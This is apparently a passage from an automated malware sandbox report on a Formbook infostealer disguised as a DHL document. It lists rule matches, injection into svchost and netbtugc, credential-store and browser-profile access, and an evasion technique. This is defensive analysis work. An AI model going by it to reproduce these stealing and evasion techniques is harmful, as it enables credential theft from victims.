            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F1D5A2_2_033F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03343D402_2_03343D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335FDC02_2_0335FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B9C322_2_033B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFCF22_2_033FFCF2
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeCode function: 3_2_0311A97C3_2_0311A97C
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeCode function: 3_2_031189FC3_2_031189FC
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeCode function: 3_2_0312107A3_2_0312107A
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeCode function: 3_2_0312107C3_2_0312107C
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeCode function: 3_2_0311A7533_2_0311A753
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeCode function: 3_2_0311A75C3_2_0311A75C
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeCode function: 3_2_03137F5C3_2_03137F5C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0332B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03375130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03387E54 appears 102 times
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: String function: 007D8900 appears 41 times
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: String function: 007B7DE1 appears 36 times
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: String function: 007D0AE3 appears 70 times
            Source: DHL 40312052024.exe, 00000000.00000003.2052710266.0000000003E0D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL 40312052024.exe
            Source: DHL 40312052024.exe, 00000000.00000003.2052257786.0000000003C63000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL 40312052024.exe
            Source: DHL 40312052024.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4472233099.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2201456108.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4473466571.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4473431930.0000000003090000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4475242478.0000000004E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4473348288.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2202258982.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2202388210.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@15/7
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0081A06A GetLastError,FormatMessageW,0_2_0081A06A
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_008081CB AdjustTokenPrivileges,CloseHandle,0_2_008081CB
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_008087E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_008087E1
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0081B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0081B3FB
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0082EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0082EE0D
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_0081C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0081C397
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007B4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_007B4E89
            Source: C:\Users\user\Desktop\DHL 40312052024.exeFile created: C:\Users\user\AppData\Local\Temp\aut10B2.tmpJump to behavior
            Source: DHL 40312052024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\DHL 40312052024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000004.00000003.2388396371.0000000002942000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4472527689.0000000002942000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4472527689.000000000296E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2388283618.0000000002921000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4472527689.000000000294A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: DHL 40312052024.exeReversingLabs: Detection: 47%
            Source: DHL 40312052024.exeVirustotal: Detection: 41%
            Source: unknownProcess created: C:\Users\user\Desktop\DHL 40312052024.exe "C:\Users\user\Desktop\DHL 40312052024.exe"
            Source: C:\Users\user\Desktop\DHL 40312052024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 40312052024.exe"
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\DHL 40312052024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 40312052024.exe"Jump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DHL 40312052024.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 40312052024.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 40312052024.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 40312052024.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 40312052024.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 40312052024.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 40312052024.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 40312052024.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 40312052024.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 40312052024.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 40312052024.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 40312052024.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: DHL 40312052024.exeStatic file information: File size 1202688 > 1048576
            Source: DHL 40312052024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: DHL 40312052024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: DHL 40312052024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: DHL 40312052024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: DHL 40312052024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: DHL 40312052024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: DHL 40312052024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000000.2120500383.00000000005AE000.00000002.00000001.01000000.00000004.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000000.2278282090.00000000005AE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: DHL 40312052024.exe, 00000000.00000003.2052018361.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, DHL 40312052024.exe, 00000000.00000003.2050921720.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2106405513.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201845784.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201845784.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104672703.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2204504702.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2201825433.0000000002AB8000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4473722633.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4473722633.0000000002E10000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL 40312052024.exe, 00000000.00000003.2052018361.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, DHL 40312052024.exe, 00000000.00000003.2050921720.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2106405513.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201845784.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201845784.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104672703.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2204504702.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2201825433.0000000002AB8000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4473722633.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4473722633.0000000002E10000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2170477605.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201616955.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000003.2140528861.0000000000B4B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4474120065.000000000343C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4472527689.00000000028BE000.00000004.00000020.00020000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000000.2278718114.0000000002A3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2497878944.000000000C1EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4474120065.000000000343C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4472527689.00000000028BE000.00000004.00000020.00020000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000000.2278718114.0000000002A3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2497878944.000000000C1EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2170477605.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2201616955.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000003.2140528861.0000000000B4B000.00000004.00000001.00020000.00000000.sdmp
            Source: DHL 40312052024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: DHL 40312052024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: DHL 40312052024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: DHL 40312052024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: DHL 40312052024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007B4B37 LoadLibraryA,GetProcAddress,0_2_007B4B37
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007BC4C7 push A3007BBAh; retn 007Bh0_2_007BC50D
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007D8945 push ecx; ret 0_2_007D8958
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004048A9 push esp; ret 2_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E2BA push 00000038h; iretd 2_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A436 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418C92 pushad ; retf 2_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A5D9 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004017E5 push ebp; retf 003Fh2_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403780 push eax; ret 2_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004147A2 push es; iretd 2_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033309AD push ecx; mov dword ptr [esp], ecx2_2_033309B6
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeCode function: 3_2_0312EC6D pushfd ; retf 3_2_0312EC97
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeCode function: 3_2_03128AC3 push 00000038h; iretd 3_2_03128AC7
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeCode function: 3_2_0310F0B2 push esp; ret 3_2_0310F0B3
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeCode function: 3_2_0312DE81 push FFFFFFBAh; ret 3_2_0312DE83
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeCode function: 3_2_03124DE2 push ebx; iretd 3_2_03124E09
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeCode function: 3_2_03124C3F push ebx; iretd 3_2_03124E09
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeCode function: 3_2_0312349B pushad ; retf 3_2_0312349C
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007B48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007B48D7
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_00835376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00835376
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007D3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007D3187
            Source: C:\Users\user\Desktop\DHL 40312052024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL 40312052024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\DHL 40312052024.exeAPI/Special instruction interceptor: Address: 149D86C
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
